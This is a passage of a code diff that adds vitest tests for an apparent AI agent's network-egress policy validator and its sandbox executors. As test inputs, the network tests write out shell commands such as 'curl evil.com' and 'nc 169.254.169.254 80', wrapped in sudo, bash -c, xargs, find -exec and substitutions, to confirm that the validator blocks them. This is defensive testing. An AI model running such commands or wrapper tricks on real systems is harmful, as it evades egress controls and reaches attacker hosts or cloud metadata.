+		expect(lookupMock).not.toHaveBeenCalled();
+	});
+
+	it("blocks multiply trailing-dot variants of denylisted hosts", async () => {
+		const result = await checkNetworkRestrictionsDetailed(
+			"https://evil.com../data",
+			{ blockedHosts: ["evil.com"] },
+		);
+
+		expect(result.allowed).toBe(false);
+		expect(result.host).toBe("evil.com");
+		expect(result.reason).toContain("blocked by enterprise policy");
+		expect(lookupMock).not.toHaveBeenCalled();
+	});
+
+	it("matches trailing-dot URLs against allowlists", async () => {
+		const result = await checkNetworkRestrictionsDetailed(
+			"https://api.github.com./repos",
+			{ allowedHosts: ["api.github.com"] },
+		);
+
+		expect(result.allowed).toBe(true);
+		expect(result.host).toBe("api.github.com");
+		const repeatedDotResult = await checkNetworkRestrictionsDetailed(
+			"https://api.github.com../repos",
+			{ allowedHosts: ["api.github.com"] },
+		);
+		expect(repeatedDotResult.allowed).toBe(true);
+		expect(repeatedDotResult.host).toBe("api.github.com");
+	});
+
 	it("still resolves allowed hosts when private IP checks are enabled", async () => {
 		lookupMock.mockResolvedValueOnce([{ address: "10.0.0.1", family: 4 }]);
 
@@ -64,4 +115,573 @@ describe("network policy validator", () => {
 		expect(result.resolvedIPs).toEqual(["10.0.0.1"]);
 		expect(lookupMock).toHaveBeenCalledWith("api.github.com", { all: true });
 	});
+
+	it("blocks canonicalized IPv6 loopback forms", async () => {
+		const result = await checkNetworkRestrictionsDetailed(
+			"http://[0:0:0:0:0:0:0:1]/api",
+			{ blockLocalhost: true },
+		);
+
+		expect(result.allowed).toBe(false);
+		expect(result.normalizedHost).toBe("::1");
+		expect(result.reason).toContain("localhost");
+		expect(lookupMock).not.toHaveBeenCalled();
+	});
+
+	it("blocks canonicalized IPv6 private forms", async () => {
+		const result = await checkNetworkRestrictionsDetailed(
+			"http://[fc00:0000::1]/api",
+			{ blockPrivateIPs: true },
+		);
+
+		expect(result.allowed).toBe(false);
+		expect(result.normalizedHost).toBe("fc00::1");
+		expect(result.reason).toContain("private IP");
+		expect(lookupMock).not.toHaveBeenCalled();
+	});
+
+	it("applies network policy to netcat host targets", async () => {
+		const result = await checkNetworkPolicy(
+			{
+				toolName: "bash",
+				args: { command: "nc 169.254.169.254 80" },
+			} as ActionApprovalContext,
+			{ blockPrivateIPs: true },
+		);
+
+		expect(result.allowed).toBe(false);
+		expect(result.reason).toContain("private IP");
+	});
+
+	it("applies network policy through shell command wrappers", async () => {
+		const sudoResult = await checkNetworkPolicy(
+			{
+				toolName: "bash",
+				args: { command: "sudo curl evil.com" },
+			} as ActionApprovalContext,
+			{ blockedHosts: ["evil.com"] },
+		);
+		const envResult = await checkNetworkPolicy(
+			{
+				toolName: "bash",
+				args: { command: "env FOO=bar nc 169.254.169.254 80" },
+			} as ActionApprovalContext,
+			{ blockPrivateIPs: true },
+		);
+
+		expect(sudoResult.allowed).toBe(false);
+		expect(sudoResult.reason).toContain("blocked by enterprise policy");
+		expect(envResult.allowed).toBe(false);
+		expect(envResult.reason).toContain("private IP");
+	});
+
+	it("applies network policy through xargs-prefixed network commands", async () => {
+		const blockedResult = await checkNetworkPolicy(
+			{
+				toolName: "bash",
+				args: { command: "xargs curl evil.com" },
+			} as ActionApprovalContext,
+			{ blockedHosts: ["evil.com"] },
+		);
+		const opaqueResult = await checkNetworkPolicy(
+			{
+				toolName: "bash",
+				args: { command: "xargs curl $TARGET" },
+			} as ActionApprovalContext,
+			{ allowedHosts: ["github.com"] },
+		);
+
+		expect(blockedResult.allowed).toBe(false);
+		expect(blockedResult.reason).toContain("blocked by enterprise policy");
+		expect(opaqueResult.allowed).toBe(false);
+		expect(opaqueResult.reason).toContain("does not expose");
+	});
+
+	it("applies network policy through bash -c wrappers", async () => {
+		const blockedResult = await checkNetworkPolicy(
+			{
+				toolName: "bash",
+				args: { command: 'bash -c "curl evil.com"' },
+			} as ActionApprovalContext,
+			{ blockedHosts: ["evil.com"] },
+		);
+		const opaqueResult = await checkNetworkPolicy(
+			{
+				toolName: "bash",
+				args: { command: 'bash -c "git fetch origin"' },
+			} as ActionApprovalContext,
+			{ allowedHosts: ["github.com"] },
+		);
+
+		expect(blockedResult.allowed).toBe(false);
+		expect(blockedResult.reason).toContain("blocked by enterprise policy");
+		expect(opaqueResult.allowed).toBe(false);
+		expect(opaqueResult.reason).toContain("does not expose");
+		const privateIpResult = await checkNetworkPolicy(
+			{
+				toolName: "bash",
+				args: { command: "sh -c 'nc 169.254.169.254 80'" },
+			} as ActionApprovalContext,
+			{ blockPrivateIPs: true },
+		);
+
+		expect(privateIpResult.allowed).toBe(false);
+		expect(privateIpResult.reason).toContain("private IP");
+		const longOptionResult = await checkNetworkPolicy(
+			{
+				toolName: "bash",
+				args: { command: "bash --command 'curl evil.com'" },
+			} as ActionApprovalContext,
+			{ blockedHosts: ["evil.com"] },
+		);
+		const gluedShortOptionResult = await checkNetworkPolicy(
+			{
+				toolName: "bash",
+				args: { command: "bash -c'curl evil.com'" },
+			} as ActionApprovalContext,
+			{ blockedHosts: ["evil.com"] },
+		);
+		const dashResult = await checkNetworkPolicy(
+			{
+				toolName: "bash",
+				args: { command: "dash -c 'git fetch origin'" },
+			} as ActionApprovalContext,
+			{ allowedHosts: ["github.com"] },
+		);
+		const execResult = await checkNetworkPolicy(
+			{
+				toolName: "bash",
+				args: { command: "exec bash -c 'curl evil.com'" },
+			} as ActionApprovalContext,
+			{ blockedHosts: ["evil.com"] },
+		);
+
+		expect(longOptionResult.allowed).toBe(false);
+		expect(longOptionResult.reason).toContain("blocked by enterprise policy");
+		expect(gluedShortOptionResult.allowed).toBe(false);
+		expect(gluedShortOptionResult.reason).toContain(
+			"blocked by enterprise policy",
+		);
+		expect(dashResult.allowed).toBe(false);
+		expect(dashResult.reason).toContain("does not expose");
+		expect(execResult.allowed).toBe(false);
+		expect(execResult.reason).toContain("blocked by enterprise policy");
+	});
+
+	it("applies network policy to command substitutions", async () => {
+		const result = await checkNetworkPolicy(
+			{
+				toolName: "bash",
+				args: { command: "echo $(curl evil.com)" },
+			} as ActionApprovalContext,
+			{ blockedHosts: ["evil.com"] },
+		);
+
+		expect(result.allowed).toBe(false);
+		expect(result.reason).toContain("blocked by enterprise policy");
+	});
+
+	it("applies network policy to find exec network commands", async () => {
+		const blockedResult = await checkNetworkPolicy(
+			{
+				toolName: "bash",
+				args: { command: "find . -exec curl evil.com \\;" },
+			} as ActionApprovalContext,
+			{ blockedHosts: ["evil.com"] },
+		);
+		const opaqueResult = await checkNetworkPolicy(
+			{
+				toolName: "bash",
+				args: { command: "find . -exec curl $TARGET \\;" },
+			} as ActionApprovalContext,
+			{ allowedHosts: ["github.com"] },
+		);
+
+		expect(blockedResult.allowed).toBe(false);
+		expect(blockedResult.reason).toContain("blocked by enterprise policy");
+		expect(opaqueResult.allowed).toBe(false);
+		expect(opaqueResult.reason).toContain("does not expose");
+	});
+
+	it("applies network policy to git remotes", async () => {
+		const result = await checkNetworkPolicy(
+			{
+				toolName: "bash",
+				args: { command: "git clone https://evil.com/repo.git" },
+			} as ActionApprovalContext,
+			{ blockedHosts: ["evil.com"] },
+		);
+
+		expect(result.allowed).toBe(false);
+		expect(result.reason).toContain("blocked by enterprise policy");
+	});
+
+	it("applies network policy to git wrapper subcommands", async () => {
+		const opaqueResult = await checkNetworkPolicy(
+			{
+				toolName: "bash",
+				args: { command: "git lfs fetch origin" },
+			} as ActionApprovalContext,
+			{ allowedHosts: ["github.com"] },
+		);
+		const blockedResult = await checkNetworkPolicy(
+			{
+				toolName: "bash",
+				args: { command: "git svn clone https://evil.com/repo.git" },
+			} as ActionApprovalContext,
+			{ blockedHosts: ["evil.com"] },
+		);
+
+		expect(opaqueResult.allowed).toBe(false);
+		expect(opaqueResult.reason).toContain("does not expose");
+		expect(blockedResult.allowed).toBe(false);
+		expect(blockedResult.reason).toContain("blocked by enterprise policy");
+	});
+
+	it("applies network policy to git archive --remote targets", async () => {
+		const result = await checkNetworkPolicy(
+			{
+				toolName: "bash",
+				args: {
+					command: "git archive --remote=git@evil.com:org/repo.git HEAD",
+				},
+			} as ActionApprovalContext,
+			{ blockedHosts: ["evil.com"] },
+		);
+
+		expect(result.allowed).toBe(false);
+		expect(result.reason).toContain("blocked by enterprise policy");
+	});
+
+	it("applies network policy to git remote add URLs", async () => {
+		const result = await checkNetworkPolicy(
+			{
+				toolName: "bash",
+				args: {
+					command: "git remote add origin https://github.com/evalops/repo.git",
+				},
+			} as ActionApprovalContext,
+			{ allowedHosts: ["github.com"] },
+		);
+
+		expect(result.allowed).toBe(true);
+	});
+
+	it("does not treat local git remote commands as network egress", async () => {
+		const verboseResult = await checkNetworkPolicy(
+			{
+				toolName: "bash",
+				args: { command: "git remote -v" },
+			} as ActionApprovalContext,
+			{ allowedHosts: ["github.com"] },
+		);
+		const removeResult = await checkNetworkPolicy(
+			{
+				toolName: "bash",
+				args: { command: "git remote remove origin" },
+			} as ActionApprovalContext,
+			{ allowedHosts: ["github.com"] },
+		);
+
+		expect(verboseResult.allowed).toBe(true);
+		expect(removeResult.allowed).toBe(true);
+	});
+
+	it("applies network policy to git submodule add URLs", async () => {
+		const allowedResult = await checkNetworkPolicy(
+			{
+				toolName: "bash",
+				args: {
+					command:
+						"git submodule add -b main https://github.com/evalops/repo.git vendor/repo",
+				},
+			} as ActionApprovalContext,
+			{ allowedHosts: ["github.com"] },
+		);
+		const blockedResult = await checkNetworkPolicy(
+			{
+				toolName: "bash",
+				args: {
+					command: "git submodule add https://evil.com/repo.git vendor/repo",
+				},
+			} as ActionApprovalContext,
+			{ blockedHosts: ["evil.com"] },
+		);
+
+		expect(allowedResult.allowed).toBe(true);
+		expect(blockedResult.allowed).toBe(false);
+		expect(blockedResult.reason).toContain("blocked by enterprise policy");
+	});
+
+	it("does not treat local git submodule bookkeeping commands as network egress", async () => {
+		const initResult = await checkNetworkPolicy(
+			{
+				toolName: "bash",
+				args: { command: "git submodule init" },
+			} as ActionApprovalContext,
+			{ allowedHosts: ["github.com"] },
+		);
+		const syncResult = await checkNetworkPolicy(
+			{
+				toolName: "bash",
+				args: { command: "git submodule sync" },
+			} as ActionApprovalContext,
+			{ allowedHosts: ["github.com"] },
+		);
+
+		expect(initResult.allowed).toBe(true);
+		expect(syncResult.allowed).toBe(true);
+	});
+
+	it("allows git clone remotes after clone option values", async () => {
+		const result = await checkNetworkPolicy(
+			{
+				toolName: "bash",
+				args: {
+					command:
+						"git clone -b main --depth 1 https://github.com/evalops/repo.git repo",
+				},
+			} as ActionApprovalContext,
+			{ allowedHosts: ["github.com"] },
+		);
+
+		expect(result.allowed).toBe(true);
+	});
+
+	it("applies network policy to localhost curl targets", async () => {
+		lookupMock.mockResolvedValueOnce([{ address: "127.0.0.1", family: 4 }]);
+
+		const result = await checkNetworkPolicy(
+			{
+				toolName: "bash",
+				args: { command: "curl localhost:3000/api" },
+			} as ActionApprovalContext,
+			{ blockPrivateIPs: true },
+		);
+
+		expect(result.allowed).toBe(true);
+		expect(lookupMock).toHaveBeenCalledWith("localhost", { all: true });
+	});
+
+	it("fails closed on network commands without a static host", async () => {
+		const result = await checkNetworkPolicy(
+			{
+				toolName: "bash",
+				args: { command: "git fetch origin" },
+			} as ActionApprovalContext,
+			{ allowedHosts: ["github.com"] },
+		);
+
+		expect(result.allowed).toBe(false);
+		expect(result.reason).toContain("does not expose");
+	});
+
+	it("applies network policy inside command substitutions", async () => {
+		const result = await checkNetworkPolicy(
+			{
+				toolName: "bash",
+				args: { command: "echo $(curl evil.com)" },
+			} as ActionApprovalContext,
+			{ blockedHosts: ["evil.com"] },
+		);
+
+		expect(result.allowed).toBe(false);
+		expect(result.reason).toContain("blocked by enterprise policy");
+	});
+
+	it("applies network policy inside shell option wrappers before -c", async () => {
+		const result = await checkNetworkPolicy(
+			{
+				toolName: "bash",
+				args: { command: "bash -o pipefail -c 'curl evil.com'" },
+			} as ActionApprovalContext,
+			{ blockedHosts: ["evil.com"] },
+		);
+
+		expect(result.allowed).toBe(false);
+		expect(result.reason).toContain("blocked by enterprise policy");
+	});
+
+	it("applies network policy inside process substitutions", async () => {
+		const blockedResult = await checkNetworkPolicy(
+			{
+				toolName: "bash",
+				args: { command: "cat <(curl evil.com)" },
+			} as ActionApprovalContext,
+			{ blockedHosts: ["evil.com"] },
+		);
+		const opaqueResult = await checkNetworkPolicy(
+			{
+				toolName: "bash",
+				args: { command: "cat <(curl $TARGET)" },
+			} as ActionApprovalContext,
+			{ allowedHosts: ["github.com"] },
+		);
+
+		expect(blockedResult.allowed).toBe(false);
+		expect(blockedResult.reason).toContain("blocked by enterprise policy");
+		expect(opaqueResult.allowed).toBe(false);
+		expect(opaqueResult.reason).toContain("does not expose");
+	});
+
+	it("does not treat command -v lookups as network egress", async () => {
+		const result = await checkNetworkPolicy(
+			{
+				toolName: "bash",
+				args: { command: "command -v curl" },
+			} as ActionApprovalContext,
+			{ allowedHosts: ["github.com"] },
+		);
+
+		expect(result.allowed).toBe(true);
+	});
+
+	it("ignores URL literals in non-network shell commands", async () => {
+		const result = await checkNetworkPolicy(
+			{
+				toolName: "bash",
+				args: { command: "echo https://evil.com" },
+			} as ActionApprovalContext,
+			{ blockedHosts: ["evil.com"] },
+		);
+
+		expect(result.allowed).toBe(true);
+	});
+
+	it("does not let a decoy URL hide an opaque network target", async () => {
+		const gitResult = await checkNetworkPolicy(
+			{
+				toolName: "bash",
+				args: { command: "git fetch origin https://github.com" },
+			} as ActionApprovalContext,
+			{ allowedHosts: ["github.com"] },
+		);
+		const netcatResult = await checkNetworkPolicy(
+			{
+				toolName: "bash",
+				args: { command: "nc $TARGET https://github.com" },
+			} as ActionApprovalContext,
+			{ allowedHosts: ["github.com"] },
+		);
+
+		expect(gitResult.allowed).toBe(false);
+		expect(gitResult.reason).toContain("does not expose");
+		expect(netcatResult.allowed).toBe(false);
+		expect(netcatResult.reason).toContain("does not expose");
+	});
+
+	it("allows validated URL-bearing flag values", async () => {
+		const result = await checkNetworkPolicy(
+			{
+				toolName: "bash",
+				args: {
+					command:
+						"git archive --remote=https://github.com/evalops/maestro.git HEAD",
+				},
+			} as ActionApprovalContext,
+			{ allowedHosts: ["github.com"] },
+		);
+
+		expect(result.allowed).toBe(true);
+	});
+
+	it("allows downloader commands with validated URLs and static output paths", async () => {
+		const result = await checkNetworkPolicy(
+			{
+				toolName: "bash",
+				args: { command: "curl https://github.com/evalops/repo ./repo.html" },
+			} as ActionApprovalContext,
+			{ allowedHosts: ["github.com"] },
+		);
+
+		expect(result.allowed).toBe(true);
+	});
+
+	it("fails closed when downloader commands include dynamic targets", async () => {
+		const result = await checkNetworkPolicy(
+			{
+				toolName: "bash",
+				args: { command: "curl https://github.com/evalops/repo $TARGET" },
+			} as ActionApprovalContext,
+			{ allowedHosts: ["github.com"] },
+		);
+
+		expect(result.allowed).toBe(false);
+		expect(result.reason).toContain("does not expose");
+	});
+
+	it("allows local git archive commands without remote targets", async () => {
+		const result = await checkNetworkPolicy(
+			{
+				toolName: "bash",
+				args: { command: "git archive --format=tar HEAD" },
+			} as ActionApprovalContext,
+			{ allowedHosts: ["github.com"] },
+		);
+
+		expect(result.allowed).toBe(true);
+	});
+
+	it("applies network policy to scp-style git archive remotes", async () => {
+		const result = await checkNetworkPolicy(
+			{
+				toolName: "bash",
+				args: {
+					command: "git archive --remote=git@evil.com:org/repo.git HEAD",
+				},
+			} as ActionApprovalContext,
+			{ blockedHosts: ["evil.com"] },
+		);
+
+		expect(result.allowed).toBe(false);
+		expect(result.reason).toContain("blocked by enterprise policy");
+	});
+
+	it("ignores inert URLs in non-network shell commands", async () => {
+		const result = await checkNetworkPolicy(
+			{
+				toolName: "bash",
+				args: { command: "echo https://evil.com" },
+			} as ActionApprovalContext,
+			{ blockedHosts: ["evil.com"] },
+		);
+
+		expect(result.allowed).toBe(true);
+	});
+
+	it("allows SSH user@host targets when the host is allowlisted", async () => {
+		const result = await checkNetworkPolicy(
+			{
+				toolName: "bash",
+				args: { command: "ssh user@github.com" },
+			} as ActionApprovalContext,
+			{ allowedHosts: ["github.com"] },
+		);
+
+		expect(result.allowed).toBe(true);
+	});
+
+	it("allows local git clone targets under network policy", async () => {
+		const result = await checkNetworkPolicy(
+			{
+				toolName: "bash",
+				args: { command: "git clone ./repo" },
+			} as ActionApprovalContext,
+			{ allowedHosts: ["github.com"] },
+		);
+
+		expect(result.allowed).toBe(true);
+	});
+
+	it("allows local git archive commands under network policy", async () => {
+		const result = await checkNetworkPolicy(
+			{
+				toolName: "bash",
+				args: { command: "git archive --format=tar HEAD" },
+			} as ActionApprovalContext,
+			{ allowedHosts: ["github.com"] },
+		);
+
+		expect(result.allowed).toBe(true);
+	});
 });
diff --git a/test/sandbox-integration.test.ts b/test/sandbox-integration.test.ts
index 1e37cd52b..b27ef33d8 100644
--- a/test/sandbox-integration.test.ts
+++ b/test/sandbox-integration.test.ts
@@ -33,6 +33,24 @@ describe("Sandbox", () => {
 			expect(result.exitCode).toBe(1);
 		});
 
+		it("should cap execWithArgs output instead of failing on large output", async () => {
+			const testDir = join(tmpdir(), `sandbox-test-${Date.now()}`);
+			mkdirSync(testDir, { recursive: true });
+			const scriptPath = join(testDir, "large-output.js");
+			writeFileSync(
+				scriptPath,
+				`process.stdout.write("x".repeat(${1024 * 1024 + 1024}));`,
+			);
+
+			try {
+				const result = await sandbox.execWithArgs("node", [scriptPath]);
+				expect(result.exitCode).toBe(0);
+				expect(result.stdout.length).toBe(1024 * 1024);
+			} finally {
+				rmSync(testDir, { recursive: true, force: true });
+			}
+		});
+
 		it("should read files", async () => {
 			const testDir = join(tmpdir(), `sandbox-test-${Date.now()}`);
 			mkdirSync(testDir, { recursive: true });
diff --git a/test/sandbox/docker-sandbox.test.ts b/test/sandbox/docker-sandbox.test.ts
new file mode 100644
index 000000000..486e23e68
--- /dev/null
+++ b/test/sandbox/docker-sandbox.test.ts
@@ -0,0 +1,150 @@
+import { EventEmitter } from "node:events";
+import { beforeEach, describe, expect, it, vi } from "vitest";
+
+const childProcessMock = vi.hoisted(() => ({
+	exec: vi.fn(),
+	spawn: vi.fn(),
+}));
+
+vi.mock("node:child_process", () => childProcessMock);
+
+import { DockerSandbox } from "../../src/sandbox/docker-sandbox.js";
+
+type MockChildProcess = EventEmitter & {
+	stdout: EventEmitter;
+	stderr: EventEmitter;
+};
+
+function createMockChildProcess(): MockChildProcess {
+	const child = new EventEmitter() as MockChildProcess;
+	child.stdout = new EventEmitter();
+	child.stderr = new EventEmitter();
+	return child;
+}
+
+describe("DockerSandbox", () => {
+	beforeEach(() => {
+		childProcessMock.exec.mockReset();
+		childProcessMock.spawn.mockReset();
+	});
+
+	it("caps execWithArgs output to the default buffer size", async () => {
+		const sandbox = new DockerSandbox();
+		(sandbox as unknown as { containerId: string | null }).containerId =
+			"container-id";
+		const child = createMockChildProcess();
+		childProcessMock.spawn.mockReturnValueOnce(child);
+
+		const promise = sandbox.execWithArgs("gh", ["api"]);
+		await Promise.resolve();
+		child.stdout.emit("data", Buffer.from("x".repeat(1024 * 1024 + 1024)));
+		child.emit("close", 0);
+
+		const result = await promise;
+
+		expect(childProcessMock.spawn).toHaveBeenCalledWith(
+			"docker",
+			["exec", "container-id", "gh", "api"],
+			{
+				signal: undefined,
+				stdio: ["ignore", "pipe", "pipe"],
+			},
+		);
+		expect(result.exitCode).toBe(0);
+		expect(result.stdout.length).toBe(1024 * 1024);
+		expect(result.stderr).toBe("");
+	});
+
+	it("treats signaled execWithArgs exits as failures", async () => {
+		const child = createMockChildProcess();
+		childProcessMock.spawn.mockReturnValueOnce(child);
+		const sandbox = new DockerSandbox();
+		(sandbox as unknown as { containerId: string | null }).containerId =
+			"container-123";
+
+		const promise = sandbox.execWithArgs("gh", ["pr", "view", "1"]);
+		await Promise.resolve();
+		child.stdout.emit("data", Buffer.from("partial output"));
+		child.stderr.emit("data", Buffer.from("terminated by signal"));
+		child.emit("close", null, "SIGKILL");
+
+		await expect(promise).resolves.toEqual({
+			stdout: "partial output",
+			stderr: "terminated by signal",
+			exitCode: 1,
+		});
+		expect(childProcessMock.spawn).toHaveBeenCalledWith(
+			"docker",
+			["exec", "container-123", "gh", "pr", "view", "1"],
+			{
+				signal: undefined,
+				stdio: ["ignore", "pipe", "pipe"],
+			},
+		);
+	});
+
+	it("returns an ExecResult when docker spawn fails", async () => {
+		const child = createMockChildProcess();
+		childProcessMock.spawn.mockReturnValueOnce(child);
+		const sandbox = new DockerSandbox();
+		(sandbox as unknown as { containerId: string | null }).containerId =
+			"container-456";
+
+		const promise = sandbox.execWithArgs("gh", ["pr", "view", "1"]);
+		await Promise.resolve();
+		child.emit(
+			"error",
+			Object.assign(new Error("spawn docker ENOENT"), { code: "ENOENT" }),
+		);
+
+		await expect(promise).resolves.toEqual({
+			stdout: "",
+			stderr: "spawn docker ENOENT",
+			exitCode: 1,
+		});
+	});
+
+	it("wraps abortable execWithArgs in a shell that forwards cancellation", async () => {
+		const child = createMockChildProcess();
+		childProcessMock.spawn.mockReturnValueOnce(child);
+		const sandbox = new DockerSandbox();
+		(sandbox as unknown as { containerId: string | null }).containerId =
+			"container-789";
+		const controller = new AbortController();
+
+		const promise = sandbox.execWithArgs(
+			"gh",
+			["repo", "clone", "owner/repo"],
+			{
+				signal: controller.signal,
+			},
+		);
+		await Promise.resolve();
+		child.emit("close", 0);
+
+		await expect(promise).resolves.toEqual({
+			stdout: "",
+			stderr: "",
+			exitCode: 0,
+		});
+		expect(childProcessMock.spawn).toHaveBeenCalledWith(
+			"docker",
+			[
+				"exec",
+				"container-789",
+				"sh",
+				"-lc",
+				expect.stringContaining("trap on_signal TERM INT HUP"),
+				"sh",
+				"gh",
+				"repo",
+				"clone",
+				"owner/repo",
+			],
+			{
+				signal: controller.signal,
+				stdio: ["ignore", "pipe", "pipe"],
+			},
+		);
+	});
+});
diff --git a/test/sandbox/local-sandbox.test.ts b/test/sandbox/local-sandbox.test.ts
new file mode 100644
index 000000000..964f709ed
--- /dev/null
+++ b/test/sandbox/local-sandbox.test.ts
@@ -0,0 +1,139 @@
+import { EventEmitter } from "node:events";
+import { beforeEach, describe, expect, it, vi } from "vitest";
+
+const childProcessMock = vi.hoisted(() => ({
+	spawn: vi.fn(),
+}));
+
+vi.mock("node:child_process", async () => {
+	const actual =
+		await vi.importActual<typeof import("node:child_process")>(
+			"node:child_process",
+		);
+	return {
+		...actual,
+		spawn: childProcessMock.spawn,
+	};
+});
+
+import { LocalSandbox } from "../../src/sandbox/local-sandbox.js";
+
+type MockChildProcess = EventEmitter & {
+	pid?: number;
+	stdout: EventEmitter;
+	stderr: EventEmitter;
+	kill: ReturnType<typeof vi.fn>;
+};
+
+function createMockChildProcess(pid = 1234): MockChildProcess {
+	const child = new EventEmitter() as MockChildProcess;
+	child.pid = pid;
+	child.stdout = new EventEmitter();
+	child.stderr = new EventEmitter();
+	child.kill = vi.fn();
+	return child;
+}
+
+describe("LocalSandbox", () => {
+	beforeEach(() => {
+		childProcessMock.spawn.mockReset();
+	});
+
+	it("caps execWithArgs stdout while preserving the child exit code", async () => {
+		const sandbox = new LocalSandbox();
+		const child = createMockChildProcess();
+		childProcessMock.spawn.mockReturnValueOnce(child);
+
+		const promise = sandbox.execWithArgs(
+			process.execPath,
+			["-e", "process.stdout.write('x'.repeat(5000))"],
+			{ maxBuffer: 1025 },
+		);
+		await Promise.resolve();
+		child.stdout.emit("data", Buffer.from("x".repeat(5000)));
+		child.emit("close", 0);
+
+		const result = await promise;
+
+		expect(childProcessMock.spawn).toHaveBeenCalledWith(
+			process.execPath,
+			["-e", "process.stdout.write('x'.repeat(5000))"],
+			expect.objectContaining({
+				detached: true,
+				stdio: ["ignore", "pipe", "pipe"],
+			}),
+		);
+		expect(result.exitCode).toBe(0);
+		expect(result.stdout).toHaveLength(1025);
+		expect(result.stderr).toBe("");
+	});
+
+	it("treats signaled execWithArgs exits as failures", async () => {
+		const sandbox = new LocalSandbox();
+		const child = createMockChildProcess();
+		childProcessMock.spawn.mockReturnValueOnce(child);
+
+		const promise = sandbox.execWithArgs("gh", ["pr", "view", "1"]);
+		await Promise.resolve();
+		child.stdout.emit("data", Buffer.from("partial output"));
+		child.stderr.emit("data", Buffer.from("terminated by signal"));
+		child.emit("close", null, "SIGKILL");
+
+		await expect(promise).resolves.toEqual({
+			stdout: "partial output",
+			stderr: "terminated by signal",
+			exitCode: 1,
+		});
+	});
+
+	it("preserves spawn error messages when execWithArgs rejects before stderr streams", async () => {
+		const sandbox = new LocalSandbox();
+		const child = createMockChildProcess();
+		childProcessMock.spawn.mockReturnValueOnce(child);
+
+		const promise = sandbox.execWithArgs("missing-gh", ["--version"]);
+		await Promise.resolve();
+		child.emit(
+			"error",
+			Object.assign(new Error("spawn missing-gh ENOENT"), { code: "ENOENT" }),
+		);
+
+		await expect(promise).resolves.toEqual({
+			stdout: "",
+			stderr: "spawn missing-gh ENOENT",
+			exitCode: 1,
+		});
+	});
+
+	it("terminates the spawned process group when execWithArgs is aborted", async () => {
+		const sandbox = new LocalSandbox();
+		const child = createMockChildProcess(4321);
+		const killSpy = vi.spyOn(process, "kill").mockReturnValue(true);
+		const controller = new AbortController();
+		childProcessMock.spawn.mockReturnValueOnce(child);
+
+		try {
+			const promise = sandbox.execWithArgs(
+				"gh",
+				["repo", "clone", "owner/repo"],
+				{
+					signal: controller.signal,
+				},
+			);
+			await Promise.resolve();
+
+			controller.abort();
+			child.emit("close", null, "SIGTERM");
+
+			await expect(promise).resolves.toEqual({
+				stdout: "",
+				stderr: "",
+				exitCode: 1,
+			});
+			expect(killSpy).toHaveBeenCalledWith(-4321, "SIGTERM");
+			expect(child.kill).not.toHaveBeenCalled();
+		} finally {
+			killSpy.mockRestore();
+		}
+	});
+});
diff --git a/test/sandbox/native-sandbox-max-buffer.test.ts b/test/sandbox/native-sandbox-max-buffer.test.ts
new file mode 100644
index 000000000..42215b140
--- /dev/null
+++ b/test/sandbox/native-sandbox-max-buffer.test.ts
@@ -0,0 +1,104 @@
+import { EventEmitter } from "node:events";
+import { mkdirSync, rmSync } from "node:fs";
+import { tmpdir } from "node:os";
+import { join } from "node:path";
+import { afterEach, beforeEach, describe, expect, it, vi } from "vitest";
+
+const childProcessMock = vi.hoisted(() => ({
+	exec: vi.fn(),
+	spawn: vi.fn(),
+}));
+
+vi.mock("node:child_process", () => childProcessMock);
+vi.mock("node:os", async () => {
+	const actual = await vi.importActual<typeof import("node:os")>("node:os");
+	return {
+		...actual,
+		platform: () => "darwin",
+	};
+});
+
+import { NativeSandbox } from "../../src/sandbox/native-sandbox.js";
+
+type MockChildProcess = EventEmitter & {
+	stdout: EventEmitter;
+	stderr: EventEmitter;
+};
+
+function createMockChildProcess(): MockChildProcess {
+	const child = new EventEmitter() as MockChildProcess;
+	child.stdout = new EventEmitter();
+	child.stderr = new EventEmitter();
+	return child;
+}
+
+describe("NativeSandbox", () => {
+	let testDir: string;
+
+	beforeEach(() => {
+		childProcessMock.exec.mockReset();
+		childProcessMock.spawn.mockReset();
+		testDir = join(tmpdir(), `native-sandbox-max-buffer-${Date.now()}`);
+		mkdirSync(testDir, { recursive: true });
+	});
+
+	afterEach(() => {
+		rmSync(testDir, { recursive: true, force: true });
+	});
+
+	it("caps execWithArgs output to the provided buffer size", async () => {
+		const sandbox = new NativeSandbox({ mode: "workspace-write" }, testDir);
+		const child = createMockChildProcess();
+		childProcessMock.spawn.mockReturnValueOnce(child);
+
+		const promise = sandbox.execWithArgs("gh", ["api"], { maxBuffer: 1025 });
+		await Promise.resolve();
+		child.stdout.emit("data", Buffer.from("x".repeat(5000)));
+		child.emit("close", 0);
+
+		const result = await promise;
+
+		expect(result.exitCode).toBe(0);
+		expect(result.stdout).toHaveLength(1025);
+		expect(result.stderr).toBe("");
+		expect(childProcessMock.spawn.mock.calls[0]?.[2]).not.toHaveProperty(
+			"maxBuffer",
+		);
+	});
+
+	it("treats signaled exec exits as failures", async () => {
+		const sandbox = new NativeSandbox({ mode: "workspace-write" }, testDir);
+		const child = createMockChildProcess();
+		childProcessMock.spawn.mockReturnValueOnce(child);
+
+		const promise = sandbox.exec("gh api");
+		await Promise.resolve();
+		child.stdout.emit("data", Buffer.from("partial output"));
+		child.stderr.emit("data", Buffer.from("terminated by signal"));
+		child.emit("close", null, "SIGKILL");
+
+		await expect(promise).resolves.toEqual({
+			stdout: "partial output",
+			stderr: "terminated by signal",
+			exitCode: 1,
+		});
+	});
+
+	it("treats signaled execWithArgs exits as failures", async () => {
+		const sandbox = new NativeSandbox({ mode: "workspace-write" }, testDir);
+		const child = createMockChildProcess();
+		childProcessMock.spawn.mockReturnValueOnce(child);
+
+		const promise = sandbox.execWithArgs("gh", ["api"]);
+		await Promise.resolve();
+		child.stdout.emit("data", Buffer.from("partial output"));
+		child.stderr.emit("data", Buffer.from("terminated by signal"));
+		child.emit("close", null, "SIGKILL");
+
+		await expect(promise).resolves.toEqual({
+			stdout: "partial output",
+			stderr: "terminated by signal",
+			exitCode: 1,
+		});
+	});
+});
diff --git a/test/sandbox/native-sandbox.test.ts b/test/sandbox/native-sandbox.test.ts
index f3bb631a3..99aee48f4 100644
--- a/test/sandbox/native-sandbox.test.ts
+++ b/test/sandbox/native-sandbox.test.ts
@@ -697,6 +697,27 @@ describe("Native Sandbox", () => {
 				await sandbox.dispose();
 			});
 
+			it("returns an ExecResult when execWithArgs is unsupported", async () => {
+				if (platform() === "darwin" && isNativeSandboxAvailable()) return;
+
+				const sandbox = createNativeSandbox(
+					{ mode: "workspace-write" },
+					testDir,
+				);
+				await sandbox.initialize();
+
+				try {
+					const result = await sandbox.execWithArgs("gh", ["--version"]);
+					expect(result.stdout).toBe("");
+					expect(result.stderr).toMatch(
